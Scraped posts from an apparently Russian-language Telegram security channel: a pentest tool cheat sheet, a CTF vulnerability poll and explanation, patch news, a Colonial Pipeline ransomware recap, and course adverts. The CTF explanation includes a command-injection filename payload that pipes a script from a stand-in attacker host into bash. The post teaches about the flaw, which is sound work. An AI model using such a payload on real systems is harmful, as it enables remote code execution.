Часть 1 — Сети, разведка, уязвимости, MITM, веб-аудит
• ifconfig — показывает сетевые интерфейсы и их параметры.
• ping — проверяет доступность узла с помощью ICMP-эхо.
• netstat — отображает сетевые подключения, порты и статистику.
• nmap — сканирует сеть и определяет открытые порты/сервисы.
• arp — просматривает или изменяет ARP-кэш.
• dig — выполняет DNS-запросы.
• whois — извлекает регистрационные данные домена.
• host — делает DNS-резолвинг.
• traceroute — показывает маршрут прохождения пакетов.
• route — отображает или изменяет таблицу маршрутизации.
• iptables — управление правилами брандмауэра Linux.
• ssh — безопасное подключение к удалённым системам.
• nc (netcat) — универсальный инструмент для работы с сетевыми потоками.
• sshuttle — туннелирование трафика по SSH, аналог VPN.
• openvpn — создание VPN-клиентов и серверов.
• socat — двунаправленная передача данных между сокетами.
• tcpdump — перехват и анализ сетевых пакетов в терминале.
• wireshark — графический анализатор сетевого трафика.
• tshark — консольная версия Wireshark.
• tcpflow — фиксирует и анализирует TCP-соединения.
• ettercap — атаки «человек посередине».
• mitmproxy — перехват и изменение HTTP/HTTPS-трафика.
• bettercap — расширенная MITM-платформа.
• ferret — сбор сетевых данных и сессий.
• p0f — пассивное определение ОС по сетевому трафику.
• nikto — сканер уязвимостей веб-серверов.
• wpscan — оценка безопасности WordPress.
• sqlmap — автоматизация SQL-инъекций.
• sqlninja — эксплуатация SQL Server.
• xsser — проверки на XSS-уязвимости.
• openvas — комплексный сканер уязвимостей.
• sslscan — анализ параметров SSL/TLS.
• lynis — аудит безопасности систем Linux.
• golismero — фреймворк анализа веб-уязвимостей.
• dirb — поиск скрытых директорий на веб-серверах.
• dirbuster — брутфорс директорий и файлов.
• dirbuster-ng — обновлённая версия DirBuster.
• gobuster — быстрый сканер директорий, поддоменов.
• dmitry — сбор информации об узле.
• theharvester — агрегирует данные из публичных источников.
• maltego — графовый анализ OSINT-данных.
• metagoofil — добыча метаданных из документов.
• recon-ng — модульная OSINT-платформа.
• dnsenum — расширенная DNS-разведка.
• dnsrecon — активное/пассивное DNS-сканирование.
• aircrack-ng — анализ и взлом Wi-Fi-сетей.
• reaver — атаки на WPS.
• airgeddon — комплексный Wi-Fi-аудит.
• wifite — автоматизация атак на Wi-Fi.
• wifiphisher — фишинг через поддельные точки доступа.
• mitmAP — создание фейковых точек доступа.
• mitm6 — MITM-атаки в IPv6-сетях.
• thc-ipv6 — набор инструментов для IPv6-сетей.
• macchanger — изменение MAC-адреса.
• nbtscan — сканирование NetBIOS-сетей.
• ike-scan — идентификация VPN-шлюзов.
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍2🔥2🥰1
Отвечайте реакциями:
👍 — SQL Injection в /api/search
👾 — Command Injection в /api/ping
🔥 — Command Injection в /api/backup
❤️ — Hardcoded credentials в коде
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
👾16❤5🔥4🥰1
Black Box — уязвимое место любого инженера
Нельзя эффективно защищать (или атаковать) AI-системы, если вы не понимаете их математическую «начинку». Adversarial attacks, отравление данных, анализ аномалий — всё это базируется на статистике и линейной алгебре.
Хотите понимать ML на уровне формул, а не просто запускать скрипты?
Завтра стартует курс «Математика для разработки AI-моделей».
💀 Стоимость: 28 200 ₽.
💀 Тайминг: Старт завтра.
Изучите архитектуру врага изнутри.
🔗 Ссылка на регистрацию
Check yourself: @proglib_academy_webinar_bot
Нельзя эффективно защищать (или атаковать) AI-системы, если вы не понимаете их математическую «начинку». Adversarial attacks, отравление данных, анализ аномалий — всё это базируется на статистике и линейной алгебре.
Хотите понимать ML на уровне формул, а не просто запускать скрипты?
Завтра стартует курс «Математика для разработки AI-моделей».
💀 Стоимость: 28 200 ₽.
💀 Тайминг: Старт завтра.
Изучите архитектуру врага изнутри.
🔗 Ссылка на регистрацию
Check yourself: @proglib_academy_webinar_bot
🥰3👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁8💯4🥰2🌚1
Коротко и по делу — что реально важно из последних уязвимостей и обновлений.
⚠️ Критическая RCE в React / Next.js
В Server Components обнаружена уязвимость CVE-2025-55182, позволяющая выполнить произвольный код удалённо.
Кого касается:
React 19.0–19.2.0, RSC-бандлы под Webpack/Parcel/Turbopack, а также проекты на Next.js.
Что делать:
— срочное обновление зависимостей;
— временно отключить RSC в критичных сервисах.
📱 Android — декабрьские патчи закрывают 0-day
Google выпустила декабрьский бюллетень: более 100 уязвимостей закрыты, несколько из них активно эксплуатировались («in the wild»).
Ключевое:
— уязвимости в Android Framework;
— риск полного компромета устройства без взаимодействия пользователя.
🤖 AI × безопасность: новые рекомендации CISA для OT/ICS
CISA выпустила руководство по безопасной интеграции AI в промышленную инфраструктуру.
Почему важно:
AI всё чаще участвует в атаках — от автоматизации фишинга до генерации эксплойтов. OT-системам приходится адаптировать защиту.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3👍1
Одна скомпрометированная учётка — и крупнейший топливопровод страны встал на 6 дней. Не технологичный zero-day, а банальный VPN без двухфакторки. Но последствия оказались масштабнее, чем у многих громких эксплойтов.
• DarkSide проникла через скомпрометированный VPN-аккаунт (без 2FA)
• Зашифровали billing-системы и украли 100GB данных
• Компания экстренно остановила весь трубопровод на 6 дней
— Дефицит топлива на Восточном побережье
— Паника на заправках, очереди, рост цен
— Режим ЧС в 17 штатах
— Выкуп $4.4M в BTC (75 BTC)
Colonial заплатила выкуп через несколько часов. FBI позже отследила и вернула $2.3M — взломав кошелёк DarkSide или получив ключи (точных данных нет).
Сама атака была технически простой: старый VPN + слабый пароль. Но последствия показали, как ransomware превратился из проблемы IT в угрозу национальной безопасности.
DarkSide закрылась через 2 недели после атаки под давлением властей.
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🥰2👍1
Самая жёсткая уязвимость здесь — 🔥 Command Injection в /api/backup.
Это прямой RCE через shell=True + невалидированный filename.
И да, один из ребят уже очень подробно и метко разнёс этот кусок, подчёркивая, что эта строка — буквально «портал в ад». Разбор действительно точный — и технически полностью верный.
Почему /api/backup — самая опасная:
subprocess.run(cmd, shell=True) = полный контроль над системой.
Можно инжектить любые последовательности команд.
-p'secret123' расширяет возможности атаки до полного доступа к БД.Пример эксплуатации:
filename: "x.sql'; curl attacker/shell.sh | bash; echo ‘»
⚠️ Остальные уязвимости:
SQL Injection в /api/search — серьёзно, но ограничено БД
Command Injection в /api/ping — опасно, но имеет меньше возможностей
Hardcoded creds — плохо, но не даёт RCE само по себе
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥰2
Шпаргалки_цифрового_детектива_Что_и_где_искать.pdf
1 MB
Справочник по расположению цифровых артефактов для расследования инцидентов.
• Windows — реестр, логи, prefetch, браузеры, USB
• macOS/iOS — plist, sqlite, unified logs, Apple apps
• Android — мессенджеры, соцсети, системные настройки
Digital forensics, incident response, threat hunting
62 страницы практики для ИБ-специалистов.
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2
В реальности Stuxnet — самый известный кибервирус — разрабатывали 5 лет. И это для земных систем.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁2🔥1🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
PowerBook 5300 против технологий, пересекающих галактику.
Время работы: несколько часов.
Результат: полная победа человечества.
Теперь вы знаете, почему это невозможно
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6🥰2👏1
Криптография, аномалии и матрицы
В основе любой серьезной системы безопасности лежит математика. Хотите искать аномалии в трафике или понимать стойкость шифрования? Придётся вспомнить линейную алгебру.
На курсе «Математика для разработки AI-моделей» мы разбираем инструменты, которые используют и дата-сайентисты, и безопасники.
В эфире ближайших вебинаров:
— операции с матрицами и векторами (база для любой аналитики);
— линейная регрессия и метод наименьших квадратов (поиск зависимостей);
— матричные разложения (SVD) для фильтрации шума и работы с большими данными.
Первая лекция уже в записи. Практика — на
Успейте залететь до 9 декабря:
https://clc.to/LojFzw
В основе любой серьезной системы безопасности лежит математика. Хотите искать аномалии в трафике или понимать стойкость шифрования? Придётся вспомнить линейную алгебру.
На курсе «Математика для разработки AI-моделей» мы разбираем инструменты, которые используют и дата-сайентисты, и безопасники.
В эфире ближайших вебинаров:
— операции с матрицами и векторами (база для любой аналитики);
— линейная регрессия и метод наименьших квадратов (поиск зависимостей);
— матричные разложения (SVD) для фильтрации шума и работы с большими данными.
Первая лекция уже в записи. Практика — на
NumPy.Успейте залететь до 9 декабря:
https://clc.to/LojFzw
🥰3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3